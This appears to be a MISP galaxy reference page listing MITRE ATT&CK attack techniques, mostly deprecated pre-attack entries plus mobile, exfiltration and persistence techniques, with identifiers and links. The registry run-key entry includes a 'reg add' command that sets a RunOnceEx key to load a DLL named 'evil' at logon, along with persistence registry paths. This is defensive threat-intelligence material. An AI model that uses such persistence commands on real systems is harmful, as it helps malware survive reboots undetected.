Attack Pattern
ATT&CK tactic
Authors
| Authors and/or Contributors |
|---|
| MITRE |
Test ability to evade automated mobile application security analysis performed by app stores - T1393
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). An adversary can submit multiple code samples to these stores deliberately designed to probe the stores' security analysis capabilities, with the goal of determining effective techniques to place malicious applications in the stores that could then be delivered to targeted devices. (Citation: Android Bouncer) (Citation: Adventures in BouncerLand) (Citation: Jekyll on iOS) (Citation: Fruit vs Zombies)
Internal MISP references
UUID c9e85b80-39e8-42df-b275-86a2afcea9e8
which can be used as unique global reference for Test ability to evade automated mobile application security analysis performed by app stores - T1393
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1393 |
kill_chain | ['pre-attack:test-capabilities'] |
Choose pre-compromised mobile app developer account credentials or signing keys - T1391
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The adversary can use account credentials or signing keys of an existing mobile app developer to publish malicious updates of existing mobile apps to an application store, or to abuse the developer's identity and reputation to publish new malicious apps. Many mobile devices are configured to automatically install new versions of already-installed apps. (Citation: Fraudenlent Apps Stolen Dev Credentials)
Internal MISP references
UUID 7a265bf0-6acc-4f43-8b22-2e58b443e62e
which can be used as unique global reference for Choose pre-compromised mobile app developer account credentials or signing keys - T1391
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1391 |
kill_chain | ['pre-attack:persona-development'] |
Enumerate externally facing software applications technologies, languages, and dependencies - T1261
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Software applications will be built using different technologies, languages, and dependencies. This information may reveal vulnerabilities or opportunities to an adversary. (Citation: CommonApplicationAttacks) (Citation: WebApplicationSecurity) (Citation: SANSTop25)
Internal MISP references
UUID ef6197fd-a58a-4006-bfd6-1d7765d8409d
which can be used as unique global reference for Enumerate externally facing software applications technologies, languages, and dependencies - T1261
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1261 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Obtain Apple iOS enterprise distribution key pair and certificate - T1392
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)
Internal MISP references
UUID d58f3996-e293-4f69-a2c8-0e1851cb8297
which can be used as unique global reference for Obtain Apple iOS enterprise distribution key pair and certificate - T1392
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1392 |
kill_chain | ['pre-attack:persona-development'] |
Analyze social and business relationships, interests, and affiliations - T1295
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Social media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)
Internal MISP references
UUID ee40d054-6e83-4302-88dc-a3af98821d8d
which can be used as unique global reference for Analyze social and business relationships, interests, and affiliations - T1295
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1295 |
kill_chain | ['pre-attack:people-weakness-identification'] |
Linux and Mac File and Directory Permissions Modification - T1222.002
Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform's permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: chown (short for change owner), and chmod (short for change mode).
Adversaries may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Unix Shell Configuration Modification or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.(Citation: 20 macOS Common Tools and Techniques)
Internal MISP references
UUID 09b130a2-a77e-4af0-a361-f46f9aad1345
which can be used as unique global reference for Linux and Mac File and Directory Permissions Modification - T1222.002
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1222/002 - webarchive
- https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/ - webarchive
- https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110 - webarchive
- https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1222.002 |
kill_chain | ['attack-macOS:defense-evasion', 'attack-Linux:defense-evasion'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Metadata', 'Process: Process Creation'] |
mitre_platforms | ['macOS', 'Linux'] |
Install and configure hardware, network, and systems - T1336
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary needs the necessary skills to set up procured equipment and software to create their desired infrastructure. (Citation: KasperskyRedOctober)
Internal MISP references
UUID 73e394e5-3d8a-40d1-ab8c-a1b4ea9db424
which can be used as unique global reference for Install and configure hardware, network, and systems - T1336
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1336 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Compromise 3rd party or closed-source vulnerability/exploit information - T1354
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
There is usually a delay between when a vulnerability or exploit is discovered and when it is made public. An adversary may target the systems of those known to research vulnerabilities in order to gain that knowledge for use during a different attack. (Citation: TempertonDarkHotel)
Internal MISP references
UUID 5a68c603-d7f9-4535-927e-ab56819eaa85
which can be used as unique global reference for Compromise 3rd party or closed-source vulnerability/exploit information - T1354
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1354 |
kill_chain | ['pre-attack:build-capabilities'] |
Discover new exploits and monitor exploit-provider forums - T1350
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may need to discover new exploits when existing exploits are no longer relevant to the environment they are trying to compromise. An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. (Citation: EquationQA)
Internal MISP references
UUID 82bbd209-f516-45e0-9542-4ffbbc2a8717
which can be used as unique global reference for Discover new exploits and monitor exploit-provider forums - T1350
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1350 |
kill_chain | ['pre-attack:build-capabilities'] |
Acquire and/or use 3rd party software services - T1330
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)
Internal MISP references
UUID 488da8ed-2887-4ef6-a39a-5b69bc6682c6
which can be used as unique global reference for Acquire and/or use 3rd party software services - T1330
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1330 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Acquire and/or use 3rd party infrastructure services - T1307
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)
Internal MISP references
UUID 286cc500-4291-45c2-99a1-e760db176402
which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1307
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1307 |
kill_chain | ['pre-attack:adversary-opsec'] |
Acquire and/or use 3rd party software services - T1308
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of 3rd party software services are available (e.g., Twitter, Dropbox, GoogleDocs). Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012) (Citation: Nemucod Facebook)
Internal MISP references
UUID 1a295f87-af63-4d94-b130-039d6221fb11
which can be used as unique global reference for Acquire and/or use 3rd party software services - T1308
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1308 |
kill_chain | ['pre-attack:adversary-opsec'] |
Test signature detection for file upload/email filters - T1361
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary can test their planned method of attack against existing security products such as email filters or intrusion detection sensors (IDS). (Citation: WiredVirusTotal)
Internal MISP references
UUID c9ac5715-ee5c-4380-baf4-6f12e304ca93
which can be used as unique global reference for Test signature detection for file upload/email filters - T1361
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1361 |
kill_chain | ['pre-attack:test-capabilities'] |
Acquire and/or use 3rd party infrastructure services - T1329
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally, botnets are available for rent or purchase. Use of these solutions allows an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: TrendmicroHideoutsLease)
Internal MISP references
UUID 795c1a92-3a26-453e-b99a-6a566aa94dc6
which can be used as unique global reference for Acquire and/or use 3rd party infrastructure services - T1329
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1329 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Acquire or compromise 3rd party signing certificates - T1310
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)
Internal MISP references
UUID e5164428-03ca-4336-a9a7-4d9ea1417e59
which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1310
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1310 |
kill_chain | ['pre-attack:adversary-opsec'] |
Compromise 3rd party infrastructure to support delivery - T1312
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)
Internal MISP references
UUID 4900fabf-1142-4c1f-92f5-0b590e049077
which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1312
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1312 |
kill_chain | ['pre-attack:adversary-opsec'] |
Acquire or compromise 3rd party signing certificates - T1332
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)
Internal MISP references
UUID 03f4a766-7a21-4b5e-9ccf-e0cf422ab983
which can be used as unique global reference for Acquire or compromise 3rd party signing certificates - T1332
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1332 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Compromise 3rd party infrastructure to support delivery - T1334
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)
Internal MISP references
UUID e51398e6-53dc-4e9f-a323-e54683d8672b
which can be used as unique global reference for Compromise 3rd party infrastructure to support delivery - T1334
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1334 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Human performs requested action of physical nature - T1385
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Through social engineering or other methods, an adversary can get users to perform physical actions that provide access to an adversary. This could include providing a password over the phone or inserting a 'found' CD or USB into a system. (Citation: AnonHBGary) (Citation: CSOInsideOutside)
Internal MISP references
UUID fb39384c-00e4-414a-88af-e80c4904e0b8
which can be used as unique global reference for Human performs requested action of physical nature - T1385
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1385 |
kill_chain | ['pre-attack:compromise'] |
Abuse of iOS Enterprise App Signing Key - T1445
An adversary could abuse an iOS enterprise app signing key (intended for enterprise in-house distribution of apps) to sign malicious iOS apps so that they can be installed on iOS devices without the app needing to be published on Apple's App Store. For example, Xiao describes use of this technique in (Citation: Xiao-iOS).
Detection: iOS 9 and above typically requires explicit user consent before allowing installation of applications signed with enterprise distribution keys rather than installed from Apple's App Store.
Platforms: iOS
Internal MISP references
UUID 51aedbd6-2837-4d15-aeb0-cb09f2bf22ac
which can be used as unique global reference for Abuse of iOS Enterprise App Signing Key - T1445
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1445 |
Deliver Malicious App via Authorized App Store - T1475
Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.
App stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:
- Adversaries may seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)
- Adversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)
- Adversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)
Internal MISP references
UUID d9db3d46-66ca-44b4-9daa-1ef97cb7465a
which can be used as unique global reference for Deliver Malicious App via Authorized App Store - T1475
in MISP communities and other software using the MISP galaxy
External references
- http://dl.acm.org/citation.cfm?id=2592796 - webarchive
- http://www.vvdveen.com/publications/BAndroid.pdf - webarchive
- https://attack.mitre.org/techniques/T1475 - webarchive
- https://jon.oberheide.org/blog/2010/06/25/remote-kill-and-install-on-google-android/ - webarchive
- https://jon.oberheide.org/files/summercon12-bouncer.pdf - webarchive
- https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH_US_12_Percoco_Adventures_in_Bouncerland_WP.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html - webarchive
- https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1475 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Device Unlock Code Guessing or Brute Force - T1459
An adversary could make educated guesses of the device lock screen's PIN/password (e.g., commonly used values, birthdays, anniversaries) or attempt a dictionary or brute force attack against it. Brute force attacks could potentially be automated (Citation: PopSci-IPBox).
Platforms: Android, iOS
Internal MISP references
UUID f296fc9c-2ff5-43ee-941e-6b49c438270a
which can be used as unique global reference for Device Unlock Code Guessing or Brute Force - T1459
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1459 |
Assign KITs, KIQs, and/or intelligence requirements - T1238
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)
Internal MISP references
UUID 4fad17d3-8f42-449d-ac4b-dbb4c486127d
which can be used as unique global reference for Assign KITs, KIQs, and/or intelligence requirements - T1238
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1238 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Assess current holdings, needs, and wants - T1236
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)
Internal MISP references
UUID 8e927b19-04a6-4aaa-a42f-4f0a53411d27
which can be used as unique global reference for Assess current holdings, needs, and wants - T1236
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1236 |
kill_chain | ['pre-attack:priority-definition-planning'] |
Submit KITs, KIQs, and intelligence requirements - T1237
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)
Internal MISP references
UUID 03da0598-ed46-4a73-bf43-0313b3522400
which can be used as unique global reference for Submit KITs, KIQs, and intelligence requirements - T1237
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1237 |
kill_chain | ['pre-attack:priority-definition-direction'] |
Common, high volume protocols and software - T1321
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Certain types of traffic (e.g., Twitter14, HTTP) are more commonly used than others. Utilizing more common protocols and software may make an adversary's traffic more difficult to distinguish from legitimate traffic. (Citation: symantecNITRO)
Internal MISP references
UUID 0c592c79-29a7-4a94-81a4-c87eae3aead6
which can be used as unique global reference for Common, high volume protocols and software - T1321
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1321 |
kill_chain | ['pre-attack:adversary-opsec'] |
Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001
Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data.
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) instead of using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that are not typically encrypted (such as HTTP or FTP).
Internal MISP references
UUID 79a4052e-1a89-4b09-aea6-51f1d11fe19c
which can be used as unique global reference for Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.001 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002
Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channel requires a private key (only in the possession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin.
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol.
Internal MISP references
UUID 8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5
which can be used as unique global reference for Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1048.002 |
kill_chain | ['attack-Linux:exfiltration', 'attack-macOS:exfiltration', 'attack-Windows:exfiltration'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Access', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow'] |
mitre_platforms | ['Linux', 'macOS', 'Windows'] |
Related clusters
To see the related clusters, click here.
Non-traditional or less attributable payment options - T1316
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Using alternative payment options allows an adversary to hide their activities. Options include cryptocurrencies, barter systems, pre-paid cards or shell accounts. (Citation: Goodin300InBitcoins)
Internal MISP references
UUID b79e8a3f-a109-47c2-a0e3-564955590a3d
which can be used as unique global reference for Non-traditional or less attributable payment options - T1316
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1316 |
kill_chain | ['pre-attack:adversary-opsec'] |
Choose pre-compromised persona and affiliated accounts - T1343
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
For attacks incorporating social engineering, the use of an online persona is important. Using an existing persona with compromised accounts may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. (Citation: AnonHBGary) (Citation: Hacked Social Media Accounts)
Internal MISP references
UUID 9a8c47f6-ae69-4044-917d-4b1602af64d9
which can be used as unique global reference for Choose pre-compromised persona and affiliated accounts - T1343
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1343 |
kill_chain | ['pre-attack:persona-development'] |
Malicious or Vulnerable Built-in Device Functionality - T1473
The mobile device could contain built-in functionality with malicious behavior or exploitable vulnerabilities. An adversary could deliberately insert and take advantage of the malicious behavior or could exploit inadvertent vulnerabilities. In many cases, it is difficult to be certain whether exploitable functionality is due to malicious intent or simply an inadvertent mistake.
Platforms: Android, iOS
Internal MISP references
UUID f9e4f526-ac9d-4df5-8949-833a82a1d2df
which can be used as unique global reference for Malicious or Vulnerable Built-in Device Functionality - T1473
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1473 |
Related clusters
To see the related clusters, click here.
Identify vulnerabilities in third-party software libraries - T1389
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Many applications use third-party software libraries, often without full knowledge of the behavior of the libraries by the application developer. For example, mobile applications often incorporate advertising libraries to generate revenue for the application developer. Vulnerabilities in these third-party libraries could potentially be exploited in any application that uses the library, and even if the vulnerabilities are fixed, many applications may still use older, vulnerable versions of the library. (Citation: Flexera News Vulnerabilities) (Citation: Android Security Review 2015) (Citation: Android Multidex RCE)
Internal MISP references
UUID ad124f84-52d2-40e3-95dd-cfdd44eae6ef
which can be used as unique global reference for Identify vulnerabilities in third-party software libraries - T1389
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1389 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Registry Run Keys / Startup Folder - T1547.001
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
The following run keys are created by default on Windows systems:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018)
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
The following Registry keys can be used to set startup folder items for persistence:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
The following Registry keys can control automatic startup of services during boot:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Programs listed in the load value of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run automatically for the currently logged-on user.
By default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
Internal MISP references
UUID 9efb1ea7-c37b-4595-9640-b7680cd84279
which can be used as unique global reference for Registry Run Keys / Startup Folder - T1547.001
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/aa376977 - webarchive
- https://attack.mitre.org/techniques/T1547/001 - webarchive
- https://blog.malwarebytes.com/cybercrime/2013/10/hiding-in-plain-sight/ - webarchive
- https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1547.001 |
kill_chain | ['attack-Windows:persistence', 'attack-Windows:privilege-escalation'] |
mitre_data_sources | ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification'] |
mitre_platforms | ['Windows'] |
Related clusters
To see the related clusters, click here.
